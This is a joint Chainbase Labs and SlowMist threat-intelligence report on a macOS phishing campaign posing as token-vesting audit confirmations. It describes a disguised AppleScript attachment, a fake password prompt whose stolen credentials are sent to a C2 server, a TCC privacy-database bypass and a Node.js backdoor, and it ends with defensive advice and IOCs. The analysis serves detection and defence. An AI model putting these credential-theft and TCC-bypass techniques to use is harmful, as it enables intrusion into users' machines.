Threat Intelligence: Token Vesting Phishing and Poisoning Analysis

Recently, Chainbase Labs detected and captured a phishing email campaign disguised as "audit/compliance confirmation," and shared the de-identified malicious sample with the SlowMist security team. The two parties jointly investigated and analyzed the malicious sample.

Author: Yao

Editor: 77

background

Recently, Chainbase Labs detected and captured a phishing email campaign disguised as "audit/compliance confirmation," and shared the de-identified malicious sample with the SlowMist security team. The two parties jointly investigated and analyzed the malicious sample.

Attackers first trick recipients into replying with a request to "confirm the company's legal English name," then follow up with phrases like "FY2025 external audit" and "Token Vesting Confirmation deadline," while sending malicious Word/PDF attachments. Through social engineering, they induce victims to open the attachments and follow instructions, thereby stealing credentials or sensitive data.

Trojan Analysis

This captured attack campaign was a targeted attack against the macOS platform, combining social engineering with multi-level fileless payloads (some stages primarily existing in the form of memory execution/temporary files). The attackers used the enticing business logic of "audit compliance" as an initial entry point, employing a disguised AppleScript script, and attempted to gain higher system/privacy privileges through induced authorization and TCC bypass, ultimately building a Node.js-based remote control environment on the victim's machine.

Based on the characteristics of the sample file, the email attachment is named "Confirmation_Token_Vesting.docx.scpt", which is actually an AppleScript script (.scpt) disguised as a docx document by using the double extension.

Decoding the script revealed that the first-stage (initial) AppleScript was primarily used to distribute subsequent malicious code.

1. Open the macOS system settings page and switch to "Software Update" to mislead users into believing that the system is undergoing a software update/repair.

2. Collect system information, such as CPU architecture (Intel/Apple Silicon), macOS version number, system language, etc., and send the information to the server so that the server can decide what kind of payload to send.

3. Download and execute the script from the suspicious domain sevrrhst[.]com, and then clean up the traces.

After decoding and analysis of the downloaded script, it was confirmed to be a malicious AppleScript, capable of information theft, permission bypass, and remote command execution.

Main behaviors of malicious scripts:

1. Fake progress bar

The script will first pop up a fake progress bar window, showing that it is "fixing system update issues" or "resolving document viewer issues".

2. phishing pop-ups

While the progress bar is running, it will pop up a highly realistic system permission/password input dialog box (disguised as a system settings prompt, with the interface including Google avatar elements):

Password theft: When the user enters the password and clicks "OK", the script calls the dscl command to verify whether the password is correct.

Back to server: Once the password verification is successful, it will immediately use curl to encode the collected username and password in Base64 and send them back to the server sevrrhst[.]com.

3. Bypassing TCC restrictions

The script attempts to modify macOS's TCC (Transparency, Consent, and Control) privacy database.

Directory spoofing: It attempts to circumvent system protection mechanisms by renaming the TCC database-related directory (com.apple.TCC).

Silent authorization: It directly injects SQL statements into the database, granting itself (and Bash, terminal, and script editor) the following permissions without the user's knowledge:

File access permissions: Download folder, documents, desktop, external disk, etc.

Privacy/Control Permissions: Camera, screen recording, keyboard event listening, accessibility features, etc.

4. Continue to establish a backdoor channel to download encrypted data named "origin," decode it, and execute it. Establish a communication channel with the server to receive remote commands and have them executed by Bash.

After preparing the Node.js environment, make another request (req=skip) to fetch the core script index.js and start the application.

index.js collects and reports information such as system version, CPU, disk, network, and processes; the server then issues new script code based on this information, which is dynamically executed by the sample using eval, thus enabling continuous scalability.

Malicious Domain Analysis

According to threat intelligence platform queries, the domain sevrrhst[.]com was registered on January 23, 2026, using a low-cost, free certificate, exhibiting typical "fast discard" characteristics. Its DNS resolution is associated with the IP address "88.119.171.59".

Further investigation revealed that this IP address was associated with more than 10 similar malicious domains, including tattomc[.]com and stomcs[.]com.

Summarize

This sample is not a single information stealer, but a phased penetration chain: first, it uses AppleScript to induce interaction and steal credentials/attempt privilege escalation, then it uses Node.js (index.js) to build a dynamically scalable remote control execution framework. Its characteristics are "legitimate tools being abused + dynamic code distribution/execution," making it unfriendly to detection strategies that rely on static features.

suggestion:

1. If you accidentally click on an email attachment/script and execute it (or have already entered your system password), please disconnect from the network immediately; proceed with further actions only after completing evidence collection, isolation, and backup/transfer of critical assets.

2. Infected users execute `tccutil reset All` to clear the TCC database and remove the authorization illegally obtained by the Trojan.

3. Clean up malicious program processes and terminate malicious Node.js processes in hidden directories.

About Chainbase Labs

Chainbase Labs is redefining data, making it a truly important financial asset in the AI era. By building a super data network, Chainbase transforms various signals scattered across the blockchain into structured, verifiable data, making it directly usable by AI models, autonomous agents, and various decentralized applications.

To date, the Chainbase network covers more than 200 blockchains, has processed over 500 billion data requests, and supports a community of more than 35,000 developers. Currently, over 10,000 projects are using Chainbase, with applications spanning a wide range of scenarios, including security infrastructure, L2 block explorers, smart agent protocols, and on-chain data analytics.

IOC

filename: Confirmation_Token_Vesting.docx.scpt

SHA256:

3e4d35903c51db3da8d4bd77491b5c181b7361aaf152609d03a1e2bb86faee43

filename: env_arm.zip

SHA256:

f9e0376114c57d659025ceb46f1ef48aa80b8af5909b2de0cf80e88040fef345

filename: index.js

SHA256:

0f1e457488fe799dee7ace7e1bc2df4c1793245f334a4298035652ebeb249414

URL:

https://sevrrhst[.]com/css/controller.php

https://sevrrhst[.]com/inc/register.php

C2: sevrrhst[.]com

IP: 88.119.171.59

Disclaimer: As a blockchain information platform, the articles published on this site represent only the personal views of the authors and guests and do not reflect the position of Web3Caff. The information contained in the articles is for reference only and does not constitute any investment advice or offer. Please comply with the relevant laws and regulations of your country or region.